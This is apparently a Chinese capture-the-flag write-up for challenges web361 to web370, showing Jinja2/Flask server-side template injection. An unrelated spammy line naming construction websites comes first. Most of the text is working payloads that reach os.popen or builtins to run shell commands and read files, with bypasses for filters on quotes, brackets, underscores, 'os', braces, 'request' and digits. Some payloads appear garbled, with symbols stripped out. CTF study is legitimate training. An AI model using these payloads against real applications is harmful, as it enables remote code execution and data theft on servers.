贵州省城乡与建设厅网站,山东省城乡建设网站,一条龙建站,培训机构停课目录
①web361 362-无过滤
②web363-过滤单双引号
③web364-过滤单双引号和args
④web365-过滤中括号[]、单双引号、args
⑤web366-过滤单双引号、args、中括号[]、下划线
⑦web367-过滤单双引号、args、中括号[]、下划线、os
⑧web368-过滤单双引号、args、中括号[]、下…目录
①web361 362-无过滤
②web363-过滤单双引号
③web364-过滤单双引号和args
④web365-过滤中括号[]、单双引号、args
⑤web366-过滤单双引号、args、中括号[]、下划线
⑦web367-过滤单双引号、args、中括号[]、下划线、os
⑧web368-过滤单双引号、args、中括号[]、下划线、os、{{
⑨web369-过滤单双引号、args、中括号[]、下划线、os、{{、request
⑩web370-过滤单双引号、args、中括号[]、下划线、os、{{、request、数字 ①web361 362-无过滤 题目给到Hint,尝试传?name{{1-1}}测试出ssti注入点
掏出武器库秒了上文有总结
?name{{url_for.__globals__[__builtins__][eval](__import__(os).popen(tac /f*).read())}}
或者
?name{{url_for.__globals__.os.popen(tac /f*).read()}} ②web363-过滤单双引号
?aosbpopenccat /flagname{{url_for.__globals__[request.args.a][request.args.b](request.args.c).read()}}
或者
?atac /f*name{{url_for.__globals__.os.popen(request.args.a).read()}} ③web364-过滤单双引号和args ?aosbpopenccat /flagname{{url_for.__globals__[request.values.a][request.values.b](request.values.c).read()}}
或者
?atac /f*name{{url_for.__globals__.os.popen(request.values.a).read()}} ④web365-过滤中括号[]、单双引号、args
?ccat /flagname{{url_for.__globals__.os.popen(request.values.c).read()}} ⑤web366-过滤单双引号、args、中括号[]、下划线
?name{{(lipsum|attr(request.cookies.a)).os.popen(request.cookies.b).read()}}
Cookie:a__globals__;bcat /flag ⑦web367-过滤单双引号、args、中括号[]、下划线、os
?name{{(lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read()}}a__globals__bosccat /flag ⑧web368-过滤单双引号、args、中括号[]、下划线、os、{{
使用{%%}绕过,再借助print()回显
?a__globals__bosccat /flagname{% print(lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read() %} ⑨web369-过滤单双引号、args、中括号[]、下划线、os、{{、request
?name {% set podict(poa,pa)|join%} {% set a(()|select|string|list)|attr(po)(24)%} {% set ini(a,a,dict(inita)|join,a,a)|join()%} {% set glo(a,a,dict(globalsa)|join,a,a)|join()%} {% set geti(a,a,dict(getitema)|join,a,a)|join()%} {% set built(a,a,dict(builtinsa)|join,a,a)|join()%} {% set x(q|attr(ini)|attr(glo)|attr(geti))(built)%} {% set chrx.chr%} {% set filechr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)%} {%print(x.open(file).read())%} ⑩web370-过滤单双引号、args、中括号[]、下划线、os、{{、request、数字
?name {% set c(dict(ea)|join|count)%} {% set cc(dict(eea)|join|count)%} {% set ccc(dict(eeea)|join|count)%} {% set cccc(dict(eeeea)|join|count)%} {% set ccccccc(dict(eeeeeeea)|join|count)%} {% set cccccccc(dict(eeeeeeeea)|join|count)%} {% set ccccccccc(dict(eeeeeeeeea)|join|count)%} {% set cccccccccc(dict(eeeeeeeeeea)|join|count)%} {% set coun(cc~cccc)|int%} {% set podict(poa,pa)|join%} {% set a(()|select|string|list)|attr(po)(coun)%} {% set ini(a,a,dict(inita)|join,a,a)|join()%} {% set glo(a,a,dict(globalsa)|join,a,a)|join()%} {% set geti(a,a,dict(getitema)|join,a,a)|join()%} {% set built(a,a,dict(builtinsa)|join,a,a)|join()%} {% set x(q|attr(ini)|attr(glo)|attr(geti))(built)%} {% set chrx.chr%} {% set filechr((cccc~ccccccc)|int)%2bchr((cccccccccc~cc)|int)%2bchr((cccccccccc~cccccccc)|int)%2bchr((ccccccccc~ccccccc)|int)%2bchr((cccccccccc~ccc)|int)%} {%print(x.open(file).read())%}
